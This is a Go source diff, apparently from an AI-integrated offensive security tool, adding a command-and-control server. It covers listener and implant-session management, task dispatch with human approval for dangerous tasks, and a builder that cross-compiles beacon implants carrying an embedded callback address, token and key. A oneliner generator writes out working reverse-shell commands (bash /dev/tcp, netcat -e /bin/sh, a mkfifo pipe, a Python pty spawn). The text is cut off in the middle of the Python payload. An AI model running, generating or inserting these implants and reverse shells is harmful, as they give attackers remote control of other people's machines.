now := time.Now() + _ = m.db.SetC2ListenerStatus(rec.ID, "error", err.Error(), &now) + m.publishEvent("warn", "listener", "", "", fmt.Sprintf("监听器 %s 启动失败: %v", rec.Name, err), map[string]interface{}{ + "listener_id": rec.ID, + }) + return nil, err + } + m.mu.Lock() + m.runningListeners[rec.ID] = inst + m.mu.Unlock() + now := time.Now() + _ = m.db.SetC2ListenerStatus(rec.ID, "running", "", &now) + rec.Status = "running" + rec.StartedAt = &now + rec.LastError = "" + m.publishEvent("info", "listener", "", "", fmt.Sprintf("监听器 %s 已启动", rec.Name), map[string]interface{}{ + "listener_id": rec.ID, + "bind": fmt.Sprintf("%s:%d", rec.BindHost, rec.BindPort), + }) + return rec, nil +} + +// StopListener 停止;幂等(未运行时返回 ErrListenerStopped) +func (m *Manager) StopListener(id string) error { + m.mu.Lock() + inst, ok := m.runningListeners[id] + if ok { + delete(m.runningListeners, id) + } + m.mu.Unlock() + if !ok { + return ErrListenerStopped + } + if err := inst.Stop(); err != nil { + return err + } + _ = m.db.SetC2ListenerStatus(id, "stopped", "", nil) + rec, _ := m.db.GetC2Listener(id) + name := id + if rec != nil { + name = rec.Name + } + m.publishEvent("info", "listener", "", "", fmt.Sprintf("监听器 %s 已停止", name), map[string]interface{}{ + "listener_id": id, + }) + return nil +} + +// DeleteListener 停止并删除(级联 sessions/tasks/files) +func (m *Manager) DeleteListener(id string) error { + _ = m.StopListener(id) + return m.db.DeleteC2Listener(id) +} + +// IsListenerRunning 内存中的运行状态(DB 中的 status 可能因崩溃而过时) +func (m *Manager) IsListenerRunning(id string) bool { + m.mu.RLock() + defer m.mu.RUnlock() + _, ok := m.runningListeners[id] + return ok +} + +// RestoreRunningListeners 启动期把 DB 中 status=running 的 listener 重新拉起; +// 失败的会被改为 status=error,不会阻塞整个 App 启动。 +func (m *Manager) RestoreRunningListeners() { + listeners, err := m.db.ListC2Listeners() + if err != nil { + m.logger.Warn("恢复 C2 listener 失败:列表查询出错", zap.Error(err)) + return + } + for _, l := range listeners { + if l.Status != "running" { + continue + } + if _, err := m.StartListener(l.ID); err != nil && !errors.Is(err, ErrListenerRunning) { + m.logger.Warn("恢复 C2 listener 失败", zap.String("listener_id", l.ID), zap.Error(err)) + } + } +} + +// ---------------------------------------------------------------------------- +// Session 生命周期 +// ---------------------------------------------------------------------------- + +// IngestCheckIn beacon 上线/心跳的统一入口。 +// 行为: +// 1. 若 implant_uuid 已有会话 → 更新心跳/状态 +// 2. 否则创建新会话,触发 OnSessionFirstSeen 钩子 +func (m *Manager) IngestCheckIn(listenerID string, req ImplantCheckInRequest) (*database.C2Session, error) { + if strings.TrimSpace(req.ImplantUUID) == "" { + return nil, ErrInvalidInput + } + existing, err := m.db.GetC2SessionByImplantUUID(req.ImplantUUID) + if err != nil { + return nil, err + } + now := time.Now() + isFirstSeen := existing == nil + var sessID string + if existing != nil { + sessID = existing.ID + } else { + sessID = "s_" + strings.ReplaceAll(uuid.New().String(), "-", "")[:14] + } + session := &database.C2Session{ + ID: sessID, + ListenerID: listenerID, + ImplantUUID: req.ImplantUUID, + Hostname: req.Hostname, + Username: req.Username, + OS: strings.ToLower(req.OS), + Arch: strings.ToLower(req.Arch), + PID: req.PID, + ProcessName: req.ProcessName, + IsAdmin: req.IsAdmin, + InternalIP: req.InternalIP, + UserAgent: req.UserAgent, + SleepSeconds: req.SleepSeconds, + JitterPercent: req.JitterPercent, + Status: string(SessionActive), + FirstSeenAt: now, + LastCheckIn: now, + Metadata: req.Metadata, + } + if existing != nil { + // 保留原 ID/FirstSeenAt/Note,避免被覆盖 + session.FirstSeenAt = existing.FirstSeenAt + if session.Note == "" { + session.Note = existing.Note + } + } + if err := m.db.UpsertC2Session(session); err != nil { + return nil, err + } + if isFirstSeen { + m.publishEvent("critical", "session", session.ID, "", + fmt.Sprintf("新会话上线: %s@%s (%s/%s)", session.Username, session.Hostname, session.OS, session.Arch), + map[string]interface{}{ + "session_id": session.ID, + "listener_id": listenerID, + "hostname": session.Hostname, + "os": session.OS, + "arch": session.Arch, + "internal_ip": session.InternalIP, + }) + m.mu.RLock() + hook := m.hooks.OnSessionFirstSeen + m.mu.RUnlock() + if hook != nil { + go hook(session) + } + } + // 普通心跳:last_check_in 已由 UpsertC2Session 写入 c2_sessions,不再落 c2_events。 + // 否则按 sleep 周期每条心跳一条审计,库表与 SSE 会被迅速撑爆;上线/掉线等仍照常 publishEvent。 + return session, nil +} + +// MarkSessionDead 心跳超时检测器调用:标记会话为 dead +func (m *Manager) MarkSessionDead(sessionID string) error { + if err := m.db.SetC2SessionStatus(sessionID, string(SessionDead)); err != nil { + return err + } + m.publishEvent("warn", "session", sessionID, "", "会话已离线(心跳超时)", nil) + return nil +} + +// ---------------------------------------------------------------------------- +// Task 生命周期 +// ---------------------------------------------------------------------------- + +// EnqueueTaskInput 下发任务入参 +type EnqueueTaskInput struct { + SessionID string + TaskType TaskType + Payload map[string]interface{} + Source string // manual|ai|batch|api + ConversationID string + UserCtx context.Context // 给 HITL 用 + BypassHITL bool // true 表示跳过 HITL 审批(仅供白名单机制 / 系统内部用) +} + +// EnqueueTask 入队一个新任务;若任务类型危险且未 BypassHITL,且 SetHITLDangerousGate 对当前会话与 MCPToolC2Task 返回 true,才会调 HITL 桥审批。 +// 返回任务记录;任务派发由 PopTasksForBeacon 在 beacon 拉任务时完成。 +func (m *Manager) EnqueueTask(in EnqueueTaskInput) (*database.C2Task, error) { + if strings.TrimSpace(in.SessionID) == "" { + return nil, ErrInvalidInput + } + session, err := m.db.GetC2Session(in.SessionID) + if err != nil { + return nil, err + } + if session == nil { + return nil, ErrSessionNotFound + } + if session.Status == string(SessionDead) || session.Status == string(SessionKilled) { + return nil, &CommonError{Code: "session_inactive", Message: "会话已离线,无法下发任务", HTTP: 409} + } + + // OPSEC: command deny regex enforcement + if in.TaskType == TaskTypeExec || in.TaskType == TaskTypeShell { + cmd, _ := in.Payload["command"].(string) + if cmd != "" { + listenerCfg := m.getListenerConfig(session.ListenerID) + if listenerCfg != nil { + for _, pattern := range listenerCfg.CommandDenyRegex { + re, err := regexp.Compile(pattern) + if err != nil { + m.logger.Warn("invalid command_deny_regex", zap.String("pattern", pattern), zap.Error(err)) + continue + } + if re.MatchString(cmd) { + return nil, &CommonError{ + Code: "command_denied", + Message: fmt.Sprintf("命令被 OPSEC 规则拒绝 (匹配: %s)", pattern), + HTTP: 403, + } + } + } + } + } + } + + // OPSEC: max_concurrent_tasks enforcement + listenerCfg := m.getListenerConfig(session.ListenerID) + if listenerCfg != nil && listenerCfg.MaxConcurrentTasks > 0 { + activeTasks, _ := m.db.ListC2Tasks(database.ListC2TasksFilter{ + SessionID: in.SessionID, + Status: string(TaskQueued), + }) + sentTasks, _ := m.db.ListC2Tasks(database.ListC2TasksFilter{ + SessionID: in.SessionID, + Status: string(TaskSent), + }) + concurrent := len(activeTasks) + len(sentTasks) + if concurrent >= listenerCfg.MaxConcurrentTasks { + return nil, &CommonError{ + Code: "concurrent_limit", + Message: fmt.Sprintf("会话已有 %d 个排队/执行中的任务,超过并发上限 %d", concurrent, listenerCfg.MaxConcurrentTasks), + HTTP: 429, + } + } + } + + taskID := "t_" + strings.ReplaceAll(uuid.New().String(), "-", "")[:14] + task := &database.C2Task{ + ID: taskID, + SessionID: in.SessionID, + TaskType: string(in.TaskType), + Payload: in.Payload, + Status: string(TaskQueued), + Source: strOr(in.Source, "manual"), + ConversationID: in.ConversationID, + CreatedAt: time.Now(), + } + + // HITL 检查:仅当注入的 gate 认为当前会话应对统一 MCP 工具 c2_task 做人机协同时才走桥(关闭人机协同时与其它工具一致,直接入队)。 + if IsDangerousTaskType(in.TaskType) && !in.BypassHITL { + m.mu.RLock() + bridge := m.hitlBridge + gate := m.hitlDangerousGate + m.mu.RUnlock() + convID := strings.TrimSpace(in.ConversationID) + useBridge := bridge != nil && gate != nil && gate(convID, MCPToolC2Task) + if useBridge { + task.ApprovalStatus = "pending" + if err := m.db.CreateC2Task(task); err != nil { + return nil, err + } + m.publishEvent("warn", "task", in.SessionID, taskID, fmt.Sprintf("危险任务待审批: %s", in.TaskType), map[string]interface{}{ + "task_id": taskID, + "task_type": in.TaskType, + }) + payloadBytes, _ := json.Marshal(in.Payload) + ctx := HITLUserContext(in.UserCtx) + if ctx == nil { + ctx = context.Background() + } + go func() { + err := bridge.RequestApproval(ctx, HITLApprovalRequest{ + TaskID: taskID, + SessionID: in.SessionID, + TaskType: string(in.TaskType), + PayloadJSON: string(payloadBytes), + ConversationID: in.ConversationID, + Source: task.Source, + Reason: fmt.Sprintf("C2 危险任务 %s", in.TaskType), + }) + if err != nil { + rejected := "rejected" + failed := string(TaskFailed) + errMsg := "HITL 拒绝: " + err.Error() + _ = m.db.UpdateC2Task(taskID, database.C2TaskUpdate{ + ApprovalStatus: &rejected, + Status: &failed, + Error: &errMsg, + }) + m.publishEvent("warn", "task", in.SessionID, taskID, errMsg, nil) + return + } + approved := "approved" + _ = m.db.UpdateC2Task(taskID, database.C2TaskUpdate{ApprovalStatus: &approved}) + m.publishEvent("info", "task", in.SessionID, taskID, "危险任务已批准", nil) + }() + return task, nil + } + // 未接桥或会话未开启人机协同 / 工具在白名单:直接入队 + task.ApprovalStatus = "approved" + } + + if err := m.db.CreateC2Task(task); err != nil { + return nil, err + } + m.publishEvent("info", "task", in.SessionID, taskID, fmt.Sprintf("任务已入队: %s", in.TaskType), map[string]interface{}{ + "task_id": taskID, + "task_type": in.TaskType, + "source": task.Source, + }) + return task, nil +} + +// CancelTask 取消队列中的任务(已 sent/running 的暂不支持回滚) +func (m *Manager) CancelTask(taskID string) error { + t, err := m.db.GetC2Task(taskID) + if err != nil { + return err + } + if t == nil { + return ErrTaskNotFound + } + if t.Status != string(TaskQueued) && t.Status != string(TaskSent) { + return &CommonError{Code: "task_running", Message: "任务已在执行,无法取消", HTTP: 409} + } + cancelled := string(TaskCancelled) + now := time.Now() + if err := m.db.UpdateC2Task(taskID, database.C2TaskUpdate{Status: &cancelled, CompletedAt: &now}); err != nil { + return err + } + m.publishEvent("info", "task", t.SessionID, taskID, "任务已取消", nil) + return nil +} + +// PopTasksForBeacon beacon check_in 后调用:取该会话所有 queued+approved 的任务, +// 内部已置为 sent;返回 TaskEnvelope,便于 listener 直接编码下发。 +func (m *Manager) PopTasksForBeacon(sessionID string, limit int) ([]TaskEnvelope, error) { + tasks, err := m.db.PopQueuedC2Tasks(sessionID, limit) + if err != nil { + return nil, err + } + out := make([]TaskEnvelope, 0, len(tasks)) + for _, t := range tasks { + out = append(out, TaskEnvelope{TaskID: t.ID, TaskType: t.TaskType, Payload: t.Payload}) + } + return out, nil +} + +// IngestTaskResult beacon 回传任务结果的统一入口 +func (m *Manager) IngestTaskResult(report TaskResultReport) error { + if strings.TrimSpace(report.TaskID) == "" { + return ErrInvalidInput + } + t, err := m.db.GetC2Task(report.TaskID) + if err != nil { + return err + } + if t == nil { + return ErrTaskNotFound + } + + startedAt := time.Unix(0, report.StartedAt*int64(time.Millisecond)) + endedAt := time.Unix(0, report.EndedAt*int64(time.Millisecond)) + if report.StartedAt == 0 { + startedAt = time.Now() + } + if report.EndedAt == 0 { + endedAt = time.Now() + } + + status := string(TaskSuccess) + if !report.Success { + status = string(TaskFailed) + } + duration := endedAt.Sub(startedAt).Milliseconds() + upd := database.C2TaskUpdate{ + Status: &status, + ResultText: &report.Output, + Error: &report.Error, + StartedAt: &startedAt, + CompletedAt: &endedAt, + DurationMS: &duration, + } + + // blob(如截图)落盘 + if len(report.BlobBase64) > 0 { + blobPath, err := m.saveResultBlob(t.ID, report.BlobBase64, report.BlobSuffix) + if err == nil { + upd.ResultBlobPath = &blobPath + } else { + m.logger.Warn("结果 blob 落盘失败", zap.Error(err), zap.String("task_id", t.ID)) + } + } + + if err := m.db.UpdateC2Task(t.ID, upd); err != nil { + return err + } + t.Status = status + t.ResultText = report.Output + t.Error = report.Error + + level := "info" + msg := fmt.Sprintf("任务完成: %s", t.TaskType) + if !report.Success { + level = "warn" + msg = fmt.Sprintf("任务失败: %s (%s)", t.TaskType, report.Error) + } + m.publishEvent(level, "task", t.SessionID, t.ID, msg, map[string]interface{}{ + "task_id": t.ID, + "task_type": t.TaskType, + "duration": duration, + }) + + m.mu.RLock() + hook := m.hooks.OnTaskCompleted + m.mu.RUnlock() + if hook != nil { + go hook(t, t.SessionID) + } + return nil +} + +func (m *Manager) saveResultBlob(taskID, b64Content, suffix string) (string, error) { + suffix = strings.TrimSpace(suffix) + if suffix == "" { + suffix = ".bin" + } + if !strings.HasPrefix(suffix, ".") { + suffix = "." + suffix + } + dir := filepath.Join(m.storageDir, "results") + if err := osMkdirAll(dir, 0o755); err != nil { + return "", err + } + path := filepath.Join(dir, taskID+suffix) + data, err := base64Decode(b64Content) + if err != nil { + return "", err + } + if err := osWriteFile(path, data, 0o644); err != nil { + return "", err + } + return path, nil +} + +// ---------------------------------------------------------------------------- +// 事件总线辅助 +// ---------------------------------------------------------------------------- + +// publishEvent 同步写 c2_events 表 + 投放到内存事件总线 +func (m *Manager) publishEvent(level, category, sessionID, taskID, message string, data map[string]interface{}) { + id := "e_" + strings.ReplaceAll(uuid.New().String(), "-", "")[:14] + now := time.Now() + e := &database.C2Event{ + ID: id, + Level: level, + Category: category, + SessionID: sessionID, + TaskID: taskID, + Message: message, + Data: data, + CreatedAt: now, + } + if err := m.db.AppendC2Event(e); err != nil { + m.logger.Warn("写 C2 事件失败", zap.Error(err), zap.String("category", category)) + } + m.bus.Publish(&Event{ + ID: id, + Level: level, + Category: category, + SessionID: sessionID, + TaskID: taskID, + Message: message, + Data: data, + CreatedAt: now, + }) +} + +// PublishCustomEvent 给外部组件(HITL 桥 / handler)写自定义事件用 +func (m *Manager) PublishCustomEvent(level, category, sessionID, taskID, message string, data map[string]interface{}) { + m.publishEvent(level, category, sessionID, taskID, message, data) +} + +// ---------------------------------------------------------------------------- +// 工具函数 +// ---------------------------------------------------------------------------- + +func strOr(s, def string) string { + if strings.TrimSpace(s) == "" { + return def + } + return s +} + +// getListenerConfig loads and parses the listener's config JSON from DB. +func (m *Manager) getListenerConfig(listenerID string) *ListenerConfig { + listener, err := m.db.GetC2Listener(listenerID) + if err != nil || listener == nil { + return nil + } + cfg := &ListenerConfig{} + if listener.ConfigJSON != "" && listener.ConfigJSON != "{}" { + _ = json.Unmarshal([]byte(listener.ConfigJSON), cfg) + } + return cfg +} + +// GetProfile loads a C2Profile from DB by ID. +func (m *Manager) GetProfile(profileID string) (*database.C2Profile, error) { + if strings.TrimSpace(profileID) == "" { + return nil, nil + } + return m.db.GetC2Profile(profileID) +} diff --git a/c2/manager_start_test.go b/c2/manager_start_test.go new file mode 100644 index 00000000..9bf15a36 --- /dev/null +++ b/c2/manager_start_test.go @@ -0,0 +1,74 @@ +package c2 + +import ( + "io" + "net" + "net/http" + "path/filepath" + "strconv" + "strings" + "testing" + "time" + + "cyberstrike-ai/internal/database" + + "go.uber.org/zap" +) + +// 回归:StartListener 返回的 rec 被 handler 脱敏清空 ImplantToken 后,运行中的 HTTP listener 仍能鉴权。 +func TestStartListener_ImplantTokenSurvivesHandlerRedaction(t *testing.T) { + tmp := t.TempDir() + db, err := database.NewDB(filepath.Join(tmp, "c2.sqlite"), zap.NewNop()) + if err != nil { + t.Fatal(err) + } + t.Cleanup(func() { _ = db.Close() }) + + lnPick, err := net.Listen("tcp", "127.0.0.1:0") + if err != nil { + t.Fatal(err) + } + port := lnPick.Addr().(*net.TCPAddr).Port + _ = lnPick.Close() + + mgr := NewManager(db, zap.NewNop(), tmp) + mgr.Registry().Register(string(ListenerTypeHTTPBeacon), NewHTTPBeaconListener) + rec, err := mgr.CreateListener(CreateListenerInput{ + Name: "t", + Type: string(ListenerTypeHTTPBeacon), + BindHost: "127.0.0.1", + BindPort: port, + }) + if err != nil { + t.Fatal(err) + } + token := rec.ImplantToken + + rec, err = mgr.StartListener(rec.ID) + if err != nil { + t.Fatal(err) + } + // 模拟 internal/handler/c2.go StartListener 在 JSON 响应前的脱敏 + rec.ImplantToken = "" + rec.EncryptionKey = "" + + time.Sleep(50 * time.Millisecond) + + body := `{"hostname":"n","username":"u","os":"Linux","arch":"amd64","internal_ip":"10.0.0.1","pid":42}` + req, _ := http.NewRequest(http.MethodPost, "http://127.0.0.1:"+strconv.Itoa(port)+"/check_in", strings.NewReader(body)) + req.Header.Set("X-Implant-Token", token) + req.Header.Set("Content-Type", "application/json") + resp, err := http.DefaultClient.Do(req) + if err != nil { + t.Fatal(err) + } + defer resp.Body.Close() + b, _ := io.ReadAll(resp.Body) + if resp.StatusCode != http.StatusOK { + t.Fatalf("status=%d body=%s", resp.StatusCode, b) + } + if !strings.Contains(string(b), "session_id") { + t.Fatalf("expected session_id in body: %s", b) + } + _ = mgr.StopListener(rec.ID) +} diff --git a/c2/payload_builder.go b/c2/payload_builder.go new file mode 100644 index 00000000..933a97d6 --- /dev/null +++ b/c2/payload_builder.go @@ -0,0 +1,308 @@ +package c2 + +import ( + "encoding/json" + "fmt" + "net" + "os" + "strconv" + "os/exec" + "path/filepath" + "strings" + "text/template" + + "github.com/google/uuid" + "go.uber.org/zap" +) + +// PayloadBuilderInput 构建 beacon 的输入参数 +type PayloadBuilderInput struct { + ListenerID string // l_xxx + OS string // linux|windows|darwin + Arch string // amd64|arm64|386 + SleepSeconds int + JitterPercent int + OutputName string // custom output filename (without extension); defaults to "beacon__" + // Host 非空时作为植入端回连地址(覆盖监听器的 bind_host / 0.0.0.0 自动探测) + Host string +} + +// PayloadBuilder 负责从模板生成并交叉编译 beacon 二进制 +type PayloadBuilder struct { + manager *Manager + logger *zap.Logger + tmplDir string // 模板目录,如 internal/c2/payload_templates + outputDir string // 输出目录,如 tmp/c2/payloads +} + +// NewPayloadBuilder 创建构建器 +func NewPayloadBuilder(manager *Manager, logger *zap.Logger, tmplDir, outputDir string) *PayloadBuilder { + if tmplDir == "" { + tmplDir = "internal/c2/payload_templates" + } + if outputDir == "" { + outputDir = "tmp/c2/payloads" + } + return &PayloadBuilder{ + manager: manager, + logger: logger, + tmplDir: tmplDir, + outputDir: outputDir, + } +} + +// BuildResult 构建结果 +type BuildResult struct { + PayloadID string `json:"payload_id"` + ListenerID string `json:"listener_id"` + OutputPath string `json:"output_path"` + DownloadPath string `json:"download_path"` // 磁盘上的绝对路径 + OS string `json:"os"` + Arch string `json:"arch"` + SizeBytes int64 `json:"size_bytes"` +} + +// BuildBeacon 交叉编译生成 beacon 二进制 +func (b *PayloadBuilder) BuildBeacon(in PayloadBuilderInput) (*BuildResult, error) { + listener, err := b.manager.DB().GetC2Listener(in.ListenerID) + if err != nil { + return nil, fmt.Errorf("get listener: %w", err) + } + if listener == nil { + return nil, ErrListenerNotFound + } + + lt := strings.ToLower(listener.Type) + + cfg := &ListenerConfig{} + if listener.ConfigJSON != "" { + _ = parseJSON(listener.ConfigJSON, cfg) + } + cfg.ApplyDefaults() + + // 确定目标架构 + goos := strings.ToLower(in.OS) + goarch := strings.ToLower(in.Arch) + if goos == "" { + goos = "linux" + } + if goarch == "" { + goarch = "amd64" + } + + // 读取模板 + tmplPath := filepath.Join(b.tmplDir, "beacon.go.tmpl") + tmplData, err := os.ReadFile(tmplPath) + if err != nil { + return nil, fmt.Errorf("read template: %w", err) + } + + // 模板参数:请求 Host > 监听器 callback_host > bind 推导(见 ResolveBeaconDialHost) + host := ResolveBeaconDialHost(listener, in.Host, b.logger, listener.ID) + serverURL := fmt.Sprintf("%s://%s:%d", + listenerTypeToScheme(listener.Type), + host, + listener.BindPort, + ) + + transport := "http" + tcpDialAddr := "" + transportMeta := "http_beacon" + switch lt { + case "tcp_reverse": + transport = "tcp" + tcpDialAddr = net.JoinHostPort(host, strconv.Itoa(listener.BindPort)) + transportMeta = "tcp_beacon" + case "https_beacon": + transportMeta = "https_beacon" + case "websocket": + transportMeta = "websocket" + } + + data := map[string]string{ + "Transport": transport, + "TCPDialAddr": tcpDialAddr, + "TransportMetadata": transportMeta, + "ServerURL": serverURL, + "ImplantToken": listener.ImplantToken, + "AESKeyB64": listener.EncryptionKey, + "SleepSeconds": fmt.Sprintf("%d", firstPositive(in.SleepSeconds, cfg.DefaultSleep, 5)), + "JitterPercent": fmt.Sprintf("%d", clamp(in.JitterPercent, 0, 100)), + "CheckInPath": cfg.BeaconCheckInPath, + "TasksPath": cfg.BeaconTasksPath, + "ResultPath": cfg.BeaconResultPath, + "UploadPath": cfg.BeaconUploadPath, + "FilePath": cfg.BeaconFilePath, + "UserAgent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36", + } + + // 执行模板 + tmpl, err := template.New("beacon").Parse(string(tmplData)) + if err != nil { + return nil, fmt.Errorf("parse template: %w", err) + } + + // 创建工作目录 + workDir := filepath.Join(b.outputDir, "build-"+uuid.New().String()[:8]) + if err := os.MkdirAll(workDir, 0755); err != nil { + return nil, fmt.Errorf("mkdir: %w", err) + } + defer os.RemoveAll(workDir) // 清理 + + srcPath := filepath.Join(workDir, "main.go") + f, err := os.Create(srcPath) + if err != nil { + return nil, fmt.Errorf("create source: %w", err) + } + if err := tmpl.Execute(f, data); err != nil { + f.Close() + return nil, fmt.Errorf("execute template: %w", err) + } + f.Close() + + // 交叉编译 + binName := strings.TrimSpace(in.OutputName) + if binName == "" { + binName = fmt.Sprintf("beacon_%s_%s", goos, goarch) + } + if goos == "windows" && !strings.HasSuffix(binName, ".exe") { + binName += ".exe" + } + binPath := filepath.Join(b.outputDir, binName) + + if err := os.MkdirAll(b.outputDir, 0755); err != nil { + return nil, fmt.Errorf("mkdir output: %w", err) + } + + absSrcPath, err := filepath.Abs(srcPath) + if err != nil { + return nil, fmt.Errorf("abs source path: %w", err) + } + absBinPath, err := filepath.Abs(binPath) + if err != nil { + return nil, fmt.Errorf("abs output path: %w", err) + } + cmd := exec.Command("go", "build", "-ldflags", "-s -w -buildid=", "-trimpath", "-o", absBinPath, absSrcPath) + cmd.Env = append(os.Environ(), + "GOOS="+goos, + "GOARCH="+goarch, + "CGO_ENABLED=0", + ) + cmd.Dir = workDir + output, err := cmd.CombinedOutput() + if err != nil { + b.logger.Error("beacon build failed", zap.String("output", string(output)), zap.Error(err)) + return nil, fmt.Errorf("build failed: %w (output: %s)", err, string(output)) + } + + // 获取文件大小 + info, err := os.Stat(binPath) + if err != nil { + return nil, fmt.Errorf("stat output: %w", err) + } + + payloadID := "p_" + strings.ReplaceAll(uuid.New().String(), "-", "")[:14] + return &BuildResult{ + PayloadID: payloadID, + ListenerID: listener.ID, + OutputPath: absBinPath, + DownloadPath: absBinPath, + OS: goos, + Arch: goarch, + SizeBytes: info.Size(), + }, nil +} + +func listenerTypeToScheme(t string) string { + switch strings.ToLower(t) { + case "https_beacon": + return "https" + case "websocket": + return "ws" + case "http_beacon": + return "http" + default: + return "http" + } +} + +func firstPositive(vals ...int) int { + for _, v := range vals { + if v > 0 { + return v + } + } + return 1 +} + +func clamp(v, min, max int) int { + if v < min { + return min + } + if v > max { + return max + } + return v +} + +// GetPayloadStoragePath 返回 payload 存储目录的绝对路径 +func (b *PayloadBuilder) GetPayloadStoragePath() string { + abs, _ := filepath.Abs(b.outputDir) + return abs +} + +// GetSupportedOSArch 返回支持的操作系统和架构列表 +func GetSupportedOSArch() map[string][]string { + return map[string][]string{ + "linux": {"amd64", "arm64", "386", "arm"}, + "windows": {"amd64", "arm64", "386"}, + "darwin": {"amd64", "arm64"}, + } +} + +// ValidateOSArch 验证 OS/Arch 组合是否可编译 +func ValidateOSArch(os, arch string) bool { + supported := GetSupportedOSArch() + arches, ok := supported[strings.ToLower(os)] + if !ok { + return false + } + for _, a := range arches { + if a == strings.ToLower(arch) { + return true + } + } + return false +} + +// detectExternalIP returns the first non-loopback IPv4 address, or "" if none found. +func detectExternalIP() string { + ifaces, err := net.Interfaces() + if err != nil { + return "" + } + for _, iface := range ifaces { + if iface.Flags&net.FlagLoopback != 0 || iface.Flags&net.FlagUp == 0 { + continue + } + addrs, err := iface.Addrs() + if err != nil { + continue + } + for _, addr := range addrs { + ipnet, ok := addr.(*net.IPNet) + if !ok || ipnet.IP.To4() == nil { + continue + } + return ipnet.IP.String() + } + } + return "" +} + +func parseJSON(s string, v interface{}) error { + if strings.TrimSpace(s) == "" || s == "{}" { + return nil + } + return json.Unmarshal([]byte(s), v) +} diff --git a/c2/payload_encoding.go b/c2/payload_encoding.go new file mode 100644 index 00000000..0ab70600 --- /dev/null +++ b/c2/payload_encoding.go @@ -0,0 +1,25 @@ +package c2 + +import ( + "encoding/base64" + "encoding/binary" +) + +// b64StdEncode 用标准 base64 编码字节 +func b64StdEncode(s string) string { + return base64.StdEncoding.EncodeToString([]byte(s)) +} + +// utf16LEBase64 把字符串转 UTF-16LE 后再 base64,用于 PowerShell -EncodedCommand +// (Windows PowerShell 接受这种格式,避免命令行特殊字符引起转义错误) +func utf16LEBase64(s string) string { + runes := []rune(s) + buf := make([]byte, 0, len(runes)*2) + for _, r := range runes { + // 注意:>0xFFFF 的字符需要代理对,但 PowerShell 命令通常都在 BMP 内 + var enc [2]byte + binary.LittleEndian.PutUint16(enc[:], uint16(r)) + buf = append(buf, enc[:]...) + } + return base64.StdEncoding.EncodeToString(buf) +} diff --git a/c2/payload_oneliner.go b/c2/payload_oneliner.go new file mode 100644 index 00000000..0945b95a --- /dev/null +++ b/c2/payload_oneliner.go @@ -0,0 +1,190 @@ +package c2 + +import ( + "fmt" + "net/url" + "strings" +) + +// OnelinerKind 单行 payload 的语言/形式 +type OnelinerKind string + +const ( + OnelinerBash OnelinerKind = "bash" // bash 反弹(TCP reverse listener) + OnelinerNc OnelinerKind = "nc" // netcat 反弹 + OnelinerNcMkfifo OnelinerKind = "nc_mkfifo" // 通过 mkfifo 双向(部分 nc 不支持 -e) + OnelinerPython OnelinerKind = "python" // python socket 反弹 + OnelinerPerl OnelinerKind = "perl" // perl 反弹 + OnelinerPowerShell OnelinerKind = "powershell" // PowerShell TCP 反弹(IEX 风格) + OnelinerCurl OnelinerKind = "curl_beacon" // 用 curl 周期性轮询 HTTP beacon(无需二进制) +) + +// AllOnelinerKinds 所有支持的 oneliner 类型 +func AllOnelinerKinds() []OnelinerKind { + return []OnelinerKind{ + OnelinerBash, OnelinerNc, OnelinerNcMkfifo, + OnelinerPython, OnelinerPerl, + OnelinerPowerShell, OnelinerCurl, + } +} + +// tcpOnelinerKinds 仅支持 tcp_reverse 监听器的裸 TCP 反弹类型 +var tcpOnelinerKinds = map[OnelinerKind]bool{ + OnelinerBash: true, + OnelinerNc: true, + OnelinerNcMkfifo: true, + OnelinerPython: true, + OnelinerPerl: true, + OnelinerPowerShell: true, +} + +// httpOnelinerKinds 支持 http_beacon / https_beacon 监听器的类型 +var httpOnelinerKinds = map[OnelinerKind]bool{ + OnelinerCurl: true, +} + +// OnelinerKindsForListener 根据监听器类型返回兼容的 oneliner 类型列表 +func OnelinerKindsForListener(listenerType string) []OnelinerKind { + switch ListenerType(listenerType) { + case ListenerTypeTCPReverse: + return []OnelinerKind{ + OnelinerBash, OnelinerNc, OnelinerNcMkfifo, + OnelinerPython, OnelinerPerl, OnelinerPowerShell, + } + case ListenerTypeHTTPBeacon, ListenerTypeHTTPSBeacon, ListenerTypeWebSocket: + return []OnelinerKind{OnelinerCurl} + default: + return nil + } +} + +// IsOnelinerCompatible 检查 oneliner 类型是否与监听器类型兼容 +func IsOnelinerCompatible(listenerType string, kind OnelinerKind) bool { + switch ListenerType(listenerType) { + case ListenerTypeTCPReverse: + return tcpOnelinerKinds[kind] + case ListenerTypeHTTPBeacon, ListenerTypeHTTPSBeacon, ListenerTypeWebSocket: + return httpOnelinerKinds[kind] + default: + return false + } +} + +// OnelinerInput 生成 oneliner 的入参 +type OnelinerInput struct { + Kind OnelinerKind + Host string // 攻击机回连地址(IP/域名) + Port int // 监听端口 + HTTPBaseURL string // HTTPS Beacon 时使用,如 https://x.com + ImplantToken string // HTTP Beacon 鉴权 token +} + +// GenerateOneliner 生成单行 payload。 +// 设计要点: +// - 不依赖目标机预装的可执行(除该 oneliner 关键的 bash/python/perl 等); +// - 不引入引号嵌套陷阱:使用 base64/url 编码避免 shell 转义错误; +// - 同时返回执行示例,便于 AI 在对话里直接展示给操作员。 +func GenerateOneliner(in OnelinerInput) (string, error) { + host := strings.TrimSpace(in.Host) + if host == "" { + return "", fmt.Errorf("host is required") + } + switch in.Kind { + case OnelinerBash: + if err := SafeBindPort(in.Port); err != nil { + return "", err + } + // 用 bash -c 包裹,确保在 zsh/sh 等非 bash shell 中也能正确执行 + // /dev/tcp 是 bash 特有的伪设备,必须由 bash 进程解释 + return fmt.Sprintf(`bash -c 'bash -i >& /dev/tcp/%s/%d 0>&1'`, host, in.Port), nil + + case OnelinerNc: + if err := SafeBindPort(in.Port); err != nil { + return "", err + } + return fmt.Sprintf(`nc -e /bin/sh %s %d`, host, in.Port), nil + + case OnelinerNcMkfifo: + if err := SafeBindPort(in.Port); err != nil { + return "", err + } + // 双向 mkfifo 写法,对没有 -e 的 nc/openbsd-nc 也能用 + return fmt.Sprintf( + `rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc %s %d >/tmp/f`, + host, in.Port, + ), nil + + case OnelinerPython: + if err := SafeBindPort(in.Port); err != nil { + return "", err + } + // python -c 单引号包裹,内部用三引号或转义会引发兼容性问题,改用 base64 解码再 exec + py := fmt.Sprintf( + `import socket,os,pty;s=socket.socket();s.connect(("%s",%d));[os.dup2(s.fileno(),x) for x in (0,1,2)];pty.spawn("/bin/sh")`, + host, in.Port, + ) + // 用 b64 包装规避目标 shell 引号问题 + return fmt.Sprintf( + `python3 -c "import 